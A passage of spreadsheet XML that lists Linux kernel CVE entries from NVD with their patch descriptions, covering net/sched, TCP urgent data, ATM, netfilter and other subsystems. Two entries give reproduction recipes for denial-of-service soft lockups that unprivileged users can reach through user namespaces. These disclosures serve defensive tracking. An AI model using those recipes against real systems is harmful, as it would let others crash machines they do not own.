      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr"/>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr"/>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: sch_htb: limit htb_classify inner-class filter hops
htb_classify() follows each filter-selected inner class by switching
to cl-&gt;filter_list, but never bounds the number of hops. A filter on
an inner class can point back to itself or to another inner class that
points back, creating an infinite loop in the packet classification
path with the qdisc lock held and BH disabled — a soft lockup / panic
from a single packet.
Bound the traversal with a hop counter and drop the packet with a
rate-limited warning once the bound is exceeded. The counter is
incremented at the point the inner filter chain is picked up, after the
TC_ACT_* switch has consumed the classifier verdict, so a terminal
TC_ACT_QUEUED/STOLEN/TRAP on the last permitted chain still sets *qerr
to __NET_XMIT_STOLEN and the packet is not charged as a drop by this
qdisc or its parent.
The bound is TC_HTB_MAXDEPTH, taken from HTB's own parameters rather than
from the qdisc hierarchy depth limit. Class levels run from 0 to
TC_HTB_MAXDEPTH - 1, so a traversal that strictly descends in level can
take at most TC_HTB_MAXDEPTH hops. That descent is what a sane
configuration does, but it is assumed here rather than enforced:
htb_find() resolves a classid against every class in the qdisc, so a
filter may equally select a sibling or an ancestor. The normal
root -&gt; inner -&gt; leaf path takes a single hop, so the bound does not
affect legitimate classification.
htb_classify() can now return NULL irrespective of CONFIG_NET_CLS_ACT,
whereas previously every NULL return sat inside that ifdef. The NULL
handler in htb_enqueue() therefore cannot stay conditional either, so
drop the ifdef around it. This matches hfsc_enqueue(), which has always
handled a NULL class unconditionally. Without it, a kernel built
without actions would dereference a NULL class instead of dropping.
Conditions to recreate the bug:
- CONFIG_NET_SCHED, CONFIG_NET_SCH_HTB, CONFIG_NET_CLS_U32,
  CONFIG_LOCKUP_DETECTOR.
- Create an HTB qdisc on a device (e.g. lo), add an inner class
  1:1 with a leaf child 1:10, install a root u32 filter selecting
  1:1, and an inner-class u32 filter on 1:1 also selecting 1:1.
- Send one packet (ping). On the unfixed kernel the classify loop
  spins with the qdisc lock held; with softlockup_panic=1 it panics.
- Reachable from unprivileged user via unshare -Urn (CAP_NET_ADMIN).</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90053</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90054</t>
        </is>
      </c>
      <c r="D422" s="5" t="inlineStr"/>
      <c r="E422" s="5" t="inlineStr"/>
      <c r="F422" s="5" t="inlineStr"/>
      <c r="G422" s="5" t="inlineStr"/>
      <c r="H422" s="5" t="inlineStr"/>
      <c r="I422" s="5" t="inlineStr"/>
      <c r="J422" s="5" t="inlineStr"/>
      <c r="K422" s="5" t="inlineStr"/>
      <c r="L422" s="5" t="inlineStr"/>
      <c r="M422" s="5" t="inlineStr"/>
      <c r="N422" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O422" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P422" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q422" s="5" t="inlineStr"/>
      <c r="R422" s="5" t="inlineStr"/>
      <c r="S422" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tcp: fix corruption of urgent data on multi-segment retransmit
On the normal xmit path, while in urgent mode we refuse to build a
multi-segment TSO packet, so every segment gets its own urg_ptr:
	/* tcp_write_xmit() */
	limit = mss_now;
	if (tso_segs &gt; 1 &amp;&amp; !tcp_urg_mode(tp))
		limit = tcp_mss_split_point(...);
The retransmit path has no such guard. __tcp_retransmit_skb() builds a
segs &gt; 1 skb and hands it to the GSO layer, which only advances th-&gt;seq
per segment and copies urg_ptr verbatim:
	/* __tcp_retransmit_skb() */
	len = cur_mss * segs;		/* segs &gt; 1, no urg_mode check */
	...
	/* tcp_gso_segment(): bumps seq only, urg_ptr is copied */
urg_ptr is an offset from the segment's own seq, so a copied value points
at a different place on each segment. The receiver rebuilds the absolute
urgent seq as seg.seq + urg_ptr, so it walks a moving urgent point instead
of the one OOB byte:
	seg1  seq 1     urg_ptr 5001 -&gt; urgent @ 5001   (ok)
	seg2  seq 1001  urg_ptr 5001 -&gt; urgent @ 6001   (wrong, +MSS)
	seg3  seq 2001  urg_ptr 5001 -&gt; urgent @ 7001   (wrong, +2*MSS)
The real OOB byte is never pointed at, so the receiver stops splicing it
out and delivers it as normal in-band data, corrupting the stream.
Guard the retransmit length like the xmit path: keep segs = 1 while in
urgent mode.</t>
        </is>
      </c>
      <c r="T422" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90054</t>
        </is>
      </c>
    </row>
    <row r="423">
      <c r="A423" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B423" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C423" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90055</t>
        </is>
      </c>
      <c r="D423" s="5" t="inlineStr"/>
      <c r="E423" s="5" t="inlineStr"/>
      <c r="F423" s="5" t="inlineStr"/>
      <c r="G423" s="5" t="inlineStr"/>
      <c r="H423" s="5" t="inlineStr"/>
      <c r="I423" s="5" t="inlineStr"/>
      <c r="J423" s="5" t="inlineStr"/>
      <c r="K423" s="5" t="inlineStr"/>
      <c r="L423" s="5" t="inlineStr"/>
      <c r="M423" s="5" t="inlineStr"/>
      <c r="N423" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O423" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P423" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q423" s="5" t="inlineStr"/>
      <c r="R423" s="5" t="inlineStr"/>
      <c r="S423" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: atm: usbatm: fix invalid ci_range initialization
syzbot reported a shift-out-of-bounds in __vcc_connect():
  UBSAN: shift-out-of-bounds in net/atm/common.c:382:32
  shift exponent -1 is negative
  CPU: 0 UID: 0 PID: 5987 Comm: syz.0.18 Not tainted syzkaller #0 PREEMPT(full)
  Hardware name: Google Compute Engine/Google Compute Engine, BIOS Google 08/05/2026
  Call Trace:
   &lt;TASK&gt;
   dump_stack_lvl+0xe8/0x150 lib/dump_stack.c:120
   ubsan_epilogue+0xa/0x30 lib/ubsan.c:233
   __ubsan_handle_shift_out_of_bounds+0x36d/0x400 lib/ubsan.c:494
   __vcc_connect+0x14b4/0x19c0 net/atm/common.c:382
   vcc_connect+0x328/0x8f0 net/atm/common.c:498
   pvc_bind+0x272/0x380 net/atm/pvc.c:52
   __sys_bind+0x2e3/0x410 net/socket.c:1976
   __x64_sys_bind+0x7a/0x90 net/socket.c:1979
   ...
ATM device ci_range fields (vpi_bits and vci_bits) represent the
number of bits supported for VPI and VCI addressing on the device.
net/atm/common.c directly uses these fields as bit shift counts:
  vpi &gt;&gt; dev-&gt;ci_range.vpi_bits
  vci &gt;&gt; dev-&gt;ci_range.vci_bits
  1 &lt;&lt; vcc-&gt;dev-&gt;ci_range.vpi_bits
  1 &lt;&lt; vcc-&gt;dev-&gt;ci_range.vci_bits
usbatm_atm_init() sets ci_range.vpi_bits and ci_range.vci_bits to
ATM_CI_MAX (-1), which is defined in &lt;uapi/linux/atmdev.h&gt; as a
sentinel value for userspace ATM_SETCIRANGE requests, not a valid bit
count. Shifting by -1 is undefined behavior and triggers UBSAN
warnings.
ATM UNI cell headers allow up to 8 bits for VPI (0..255) and 16 bits
for VCI (0..65535). Initialize vpi_bits to 8 and vci_bits to 16, as
done by solos-pci.</t>
        </is>
      </c>
      <c r="T423" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90055</t>
        </is>
      </c>
    </row>
    <row r="424">
      <c r="A424" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B424" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C424" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90056</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2026-09-17</t>
        </is>
      </c>
      <c r="P424" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q424" s="5" t="inlineStr"/>
      <c r="R424" s="5" t="inlineStr"/>
      <c r="S424" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: fec: only stop PTP if it was initialized
fec_ptp_init() is only called when fep-&gt;bufdesc_ex is available.
However, fec_probe() unconditionally calls fec_ptp_stop() on the
failed_init path, and fec_drv_remove() unconditionally calls
fec_ptp_stop() during device removal.
Check fep-&gt;bufdesc_ex before calling fec_ptp_stop() in both paths
to avoid stopping PTP when it was not initialized.</t>
        </is>
      </c>
      <c r="T424" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90056</t>
        </is>
      </c>
    </row>
    <row r="425">
      <c r="A425" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B425" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C425" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90057</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2026-09-17</t>
        </is>
      </c>
      <c r="P425" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q425" s="5" t="inlineStr"/>
      <c r="R425" s="5" t="inlineStr"/>
      <c r="S425" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
slip: remove slip_hangup() to fix use-after-free in slip_receive_buf()
Jaeyoung Chung and Eulgyu Kim reported a slab-use-after-free read
in slip_receive_buf() when racing against tty hangup.
tty_ldisc_hangup() calls ld-&gt;ops-&gt;hangup() while holding only
a read lock on tty-&gt;ldisc_sem (via tty_ldisc_ref()).
Because slip_hangup() simply called slip_close(), it ran concurrently
with reader functions such as slip_receive_buf().
slip_close() unregisters and frees the net device and its private
struct slip, causing concurrent reader threads in slip_receive_buf()
to dereference freed memory.
Line discipline close() is already guaranteed to be called under
the write lock of tty-&gt;ldisc_sem during hangup processing
(in tty_ldisc_reinit() or tty_ldisc_kill()).
Remove slip_hangup() so teardown is serialized cleanly by slip_close().</t>
        </is>
      </c>
      <c r="T425" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90057</t>
        </is>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B426" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C426" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90058</t>
        </is>
      </c>
      <c r="D426" s="5" t="inlineStr"/>
      <c r="E426" s="5" t="inlineStr"/>
      <c r="F426" s="5" t="inlineStr"/>
      <c r="G426" s="5" t="inlineStr"/>
      <c r="H426" s="5" t="inlineStr"/>
      <c r="I426" s="5" t="inlineStr"/>
      <c r="J426" s="5" t="inlineStr"/>
      <c r="K426" s="5" t="inlineStr"/>
      <c r="L426" s="5" t="inlineStr"/>
      <c r="M426" s="5" t="inlineStr"/>
      <c r="N426" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O426" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P426" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q426" s="5" t="inlineStr"/>
      <c r="R426" s="5" t="inlineStr"/>
      <c r="S426" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: bound qdisc_pkt_len to prevent qdisc soft lockup
qdisc_get_stab() accepts a user-supplied size table, and
__qdisc_calculate_pkt_len() amplifies qdisc_pkt_len() through the
overhead, the size-table data (u16), and size_log (up to
STAB_SIZE_LOG_MAX). A crafted stab can therefore set qdisc_pkt_len()
to ~1 GiB for an ordinary skb. Per-flow deficit schedulers such as
DRR and ETS replenish one quantum per loop iteration; with a tiny
quantum (1) they spin billions of times under the qdisc lock,
producing a soft lockup / RCU stall as illustrated by vega@nebusec.ai.
Cap the final qdisc_pkt_len() to QDISC_PKT_LEN_MAX so the size-table
amplification cannot drive deficit schedulers into an unbounded loop.
A legitimate size table (e.g. qfq's overhead 999999999, which is
handled by dropping) is still accepted.
Introduce cap QDISC_PKT_LEN_MAX (1 &lt;&lt; 20) = 1 MiB which is well above
any legitimate single-skb wire length: the largest current skb-&gt;len
is GSO_MAX_SIZE (524280), and an ATM-style size table (53/48 cell tax)
amplifies that to ~578 KB, both comfortably below 1 MiB. At the same
time, 1 MiB bounds the deficit refill loop to ~1M iterations per
packet with quantum=1, which completes in a few milliseconds well
under the demonstrated softlockup threshold (~10^9 iterations).
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_NET_SCH_DRR=y (or CONFIG_NET_SCH_ETS=y).
- Attach a DRR (or ETS) root qdisc with a crafted TCA_STAB that
  amplifies qdisc_pkt_len to ~1 GiB (e.g. size_log=15, data=[32768]).
- Add a class with a tiny quantum of 1 and send one small packet; the
  deficit loop spins billions of times under the qdisc lock and trips
  the softlockup detector (panic with kernel.softlockup_panic=1).
- Reachable as root or from an unprivileged user in a fresh user+net
  namespace (unshare -Urn) with namespace-local CAP_NET_ADMIN.</t>
        </is>
      </c>
      <c r="T426" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90058</t>
        </is>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B427" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C427" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90059</t>
        </is>
      </c>
      <c r="D427" s="5" t="inlineStr"/>
      <c r="E427" s="5" t="inlineStr"/>
      <c r="F427" s="5" t="inlineStr"/>
      <c r="G427" s="5" t="inlineStr"/>
      <c r="H427" s="5" t="inlineStr"/>
      <c r="I427" s="5" t="inlineStr"/>
      <c r="J427" s="5" t="inlineStr"/>
      <c r="K427" s="5" t="inlineStr"/>
      <c r="L427" s="5" t="inlineStr"/>
      <c r="M427" s="5" t="inlineStr"/>
      <c r="N427" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O427" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P427" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q427" s="5" t="inlineStr"/>
      <c r="R427" s="5" t="inlineStr"/>
      <c r="S427" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: restore NET_IP_ALIGN in the RX DMA offset
Since the RX path was converted to zero-copy, the page pool page is handed
to the stack directly as the skb head, and the offset the DMA engine writes
at is what determines the alignment of the packet headers.
Before the conversion the payload was copied into an skb obtained from
napi_alloc_skb(), which reserves NET_SKB_PAD + NET_IP_ALIGN. The
conversion moved the headroom into stmmac_rx_offset() but did not carry
over NET_IP_ALIGN, so on architectures where NET_IP_ALIGN is 2 the IP
header now lands misaligned:
  64 (NET_SKB_PAD) + 14 (ethernet) + 20 (IP) = 98
Same for the XDP branch:
  256 (XDP_PACKET_HEADROOM) + 14 (ethernet) + 20 (IP) = 290
On ARM32 this is fatal, because ldm and ldrd trap on unaligned addresses
even when CONFIG_HAVE_EFFICIENT_UNALIGNED_ACCESS is set.
Any received echo request panics the machine, e.g:
  Unhandled fault: alignment exception (0x001) at 0x81873062
  Internal error: : 1 [#1] SMP ARM
  Hardware name: Altera SOCFPGA Arria10
  PC is at icmp_echo+0x38/0xa8
  LR is at icmp_rcv+0x22c/0x370
  Call trace:
   icmp_echo from icmp_rcv+0x22c/0x370
   icmp_rcv from ip_protocol_deliver_rcu+0x2c/0x224
   ip_protocol_deliver_rcu from ip_local_deliver+0xc8/0x1a0
   ip_local_deliver from ip_sublist_rcv_finish+0x3c/0x50
   ip_sublist_rcv_finish from ip_list_rcv_finish+0x110/0x118
   ip_list_rcv_finish from ip_list_rcv+0xc8/0xdc
   ip_list_rcv from __netif_receive_skb_list_core+0x170/0x1c0
   ...
   napi_complete_done from stmmac_napi_poll_rx+0xcb0/0x1030
  Code: e24dd068 e59020a0 e28dc010 e0822001 (e8920003)
  Kernel panic - not syncing: Fatal exception in interrupt
The faulting instruction is the ldm of *icmp_hdr(skb) in icmp_echo().
Fix by adding NET_IP_ALIGN back to the RX offset, which restores the
alignment the stack used to get.
Note that commit a955318fe67e ("stmmac: align RX buffers") made a similar
change in 2021 and was reverted by commit 12d125b4574b ("stmmac: Revert
"stmmac: align RX buffers"") because it caused packet corruption. That
patch raised the offset from 0 without adjusting the buffer size
accounting, so the DMA engine could arguably write past the end of the RX
buffers, though this was never root caused.
Commit df542f669307 ("net: stmmac: Switch to zero-copy in non-XDP RX
path") since derives the page pool allocation from stmmac_rx_offset(), so
the extra bytes are accounted for.</t>
        </is>
      </c>
      <c r="T427" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90059</t>
        </is>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B428" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C428" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90060</t>
        </is>
      </c>
      <c r="D428" s="5" t="inlineStr"/>
      <c r="E428" s="5" t="inlineStr"/>
      <c r="F428" s="5" t="inlineStr"/>
      <c r="G428" s="5" t="inlineStr"/>
      <c r="H428" s="5" t="inlineStr"/>
      <c r="I428" s="5" t="inlineStr"/>
      <c r="J428" s="5" t="inlineStr"/>
      <c r="K428" s="5" t="inlineStr"/>
      <c r="L428" s="5" t="inlineStr"/>
      <c r="M428" s="5" t="inlineStr"/>
      <c r="N428" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O428" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P428" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q428" s="5" t="inlineStr"/>
      <c r="R428" s="5" t="inlineStr"/>
      <c r="S428" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: control: Don't add invalid kcontrols to LED layer
The kcontrol LED state layer tries to track the all associated
kcontrol elements with naive assumptions that they are readable.
But one can create a write-only element that has no get callback (even
a user element can do it), and this may lead to a NULL dereference at
the call chain of snd_ctl_led_notify(), as found by syzkaller.
For avoiding the Oops, add a sanity check of the kcontrol's info and
get callbacks, and just skip the invalid kcontrols before assigning
the kctl to the LED layer.</t>
        </is>
      </c>
      <c r="T428" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90060</t>
        </is>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B429" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C429" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90061</t>
        </is>
      </c>
      <c r="D429" s="5" t="inlineStr"/>
      <c r="E429" s="5" t="inlineStr"/>
      <c r="F429" s="5" t="inlineStr"/>
      <c r="G429" s="5" t="inlineStr"/>
      <c r="H429" s="5" t="inlineStr"/>
      <c r="I429" s="5" t="inlineStr"/>
      <c r="J429" s="5" t="inlineStr"/>
      <c r="K429" s="5" t="inlineStr"/>
      <c r="L429" s="5" t="inlineStr"/>
      <c r="M429" s="5" t="inlineStr"/>
      <c r="N429" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O429" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P429" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q429" s="5" t="inlineStr"/>
      <c r="R429" s="5" t="inlineStr"/>
      <c r="S429" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: skip double clone set expressions on element insert
Both the dynset and newsetelem path clone the existing set expressions
when setting set element expressions if no override expressions are
provided. This results in a double clone, once to clone the template set
expressions then another clone on the new element. Add a flag to
annotate if userspace provides a override expression (ie. expression of
the same type of the set but different configuration), otherwise borrow
the existing expression from the set. Add conditionals to release
expression iif they represent an override. Use this new override_exprs
flag to dump the dynset expression override to userspace.
This simplifies the existing logic and it also fixes a bug with the
connlimit expression which results in a module refcount imbalance
WARNING splat when resorting on the default set expressions.</t>
        </is>
      </c>
      <c r="T429" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90061</t>
        </is>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B430" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C430" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90062</t>
        </is>
      </c>
      <c r="D430" s="5" t="inlineStr"/>
      <c r="E430" s="5" t="inlineStr"/>
      <c r="F430" s="5" t="inlineStr"/>
      <c r="G430" s="5" t="inlineStr"/>
      <c r="H430" s="5" t="inlineStr"/>
      <c r="I430" s="5" t="inlineStr"/>
      <c r="J430" s="5" t="inlineStr"/>
      <c r="K430" s="5" t="inlineStr"/>
      <c r="L430" s="5" t="inlineStr"/>
      <c r="M430" s="5" t="inlineStr"/>
      <c r="N430" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O430" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P430" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q430" s="5" t="inlineStr"/>
      <c r="R430" s="5" t="inlineStr"/>
      <c r="S430" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: move hardware offload step after building the chain blob
Allocate the chain blob before the ruleset offload to reduce chances of
entering an inconsistent state where the offloaded ruleset in the nic
and the software ruleset differ.</t>
        </is>
      </c>
      <c r="T430" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90062</t>
        </is>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B431" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C431" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90063</t>
        </is>
      </c>
      <c r="D431" s="5" t="inlineStr"/>
      <c r="E431" s="5" t="inlineStr"/>
      <c r="F431" s="5" t="inlineStr"/>
      <c r="G431" s="5" t="inlineStr"/>
      <c r="H431" s="5" t="inlineStr"/>
      <c r="I431" s="5" t="inlineStr"/>
      <c r="J431" s="5" t="inlineStr"/>
      <c r="K431" s="5" t="inlineStr"/>
      <c r="L431" s="5" t="inlineStr"/>
      <c r="M431" s="5" t="inlineStr"/>
      <c r="N431" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O431" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P431" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q431" s="5" t="inlineStr"/>
      <c r="R431" s="5" t="inlineStr"/>
      <c r="S431" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
virtio-net: Ensure that TCP packets don't overflow gso_segs
The user can specify any gso_size in a packet crafted with an AF_PACKET
PACKET_VNET_HDR socket, even smaller than TCP_MIN_GSO_SIZE = 8. At the
same time, GSO_MAX_SIZE = 8 * GSO_MAX_SEGS = 8 * 65535. When the user
crafts a packet with gso_size &lt; 8, there is a risk for partial GSO to
overflow the 16-bit gso_segs field when dividing the SKB length by
gso_size.
Adjust gso_size of TCP packets to be at least TCP_MIN_GSO_SIZE = 8. Keep
gso_size of UDP GSO packets, as gso_size=1 is valid and explicitly
tested at tools/testing/selftests/net/tun.c:649.</t>
        </is>
      </c>
      <c r="T431" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90063</t>
        </is>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B432" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C432" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90064</t>
        </is>
      </c>
      <c r="D432" s="5" t="inlineStr"/>
      <c r="E432" s="5" t="inlineStr"/>
      <c r="F432" s="5" t="inlineStr"/>
      <c r="G432" s="5" t="inlineStr"/>
      <c r="H432" s="5" t="inlineStr"/>
      <c r="I432" s="5" t="inlineStr"/>
      <c r="J432" s="5" t="inlineStr"/>
      <c r="K432" s="5" t="inlineStr"/>
      <c r="L432" s="5" t="inlineStr"/>
      <c r="M432" s="5" t="inlineStr"/>
      <c r="N432" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O432" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P432" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q432" s="5" t="inlineStr"/>
      <c r="R432" s="5" t="inlineStr"/>
      <c r="S432" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/xe: Reject page faults from non-fault-mode scratch VMs
Having scratch enabled does not make a VM capable of handling recoverable
page faults. Allowing scratch VMs through the ASID lookup also admits
dma-fence mode VMs.
If such a VM faults on an already valid VMA, the handler reports success
without fixing the fault, causing the GPU to retry indefinitely.
Only allow fault-mode VMs through the ASID lookup. Fault-mode VMs using
scratch remain supported, while faults from 3D VMs are rejected.
(cherry picked from commit bfb24a06405b652d37831f3fb66b71d33a6605de)</t>
        </is>
      </c>
      <c r="T432" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90064</t>
        </is>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B433" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C433" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90065</t>
        </is>
      </c>
      <c r="D433" s="5" t="inlineStr"/>
      <c r="E433" s="5" t="inlineStr"/>
      <c r="F433" s="5" t="inlineStr"/>
      <c r="G433" s="5" t="inlineStr"/>
      <c r="H433" s="5" t="inlineStr"/>
      <c r="I433" s="5" t="inlineStr"/>
      <c r="J433" s="5" t="inlineStr"/>
      <c r="K433" s="5" t="inlineStr"/>
      <c r="L433" s="5" t="inlineStr"/>
      <c r="M433" s="5" t="inlineStr"/>
      <c r="N433" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O433" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P433" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q433" s="5" t="inlineStr"/>
      <c r="R433" s="5" t="inlineStr"/>
      <c r="S433" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: release the internal TCP sock on IPPROTO_SMC socket creation failure
IPPROTO_SMC sockets create an internal TCP sock ("clcsock") from the
proto-&gt;init hook. When socket creation fails after proto-&gt;init has
run - e.g. a cgroup BPF program attached to BPF_CGROUP_INET_SOCK_CREATE
denies the socket - sk_common_release() only invokes sk_prot-&gt;destroy
if it is set, but neither smc_inet_prot nor smc_inet6_prot defines it,
and smc_destruct() returns early unless sk_state is SMC_CLOSED. As a
result, every failing socket(AF_INET, SOCK_STREAM, IPPROTO_SMC) call
leaks one tcp_sock, so an unprivileged task able to attach a deny-all
BPF_CGROUP_INET_SOCK_CREATE program to its own cgroup can grow kernel
memory unboundedly.
Add a .destroy hook to both protos that releases the clcsock via
smc_clcsock_release(). smc_sk_init() hashes the sock into the smc
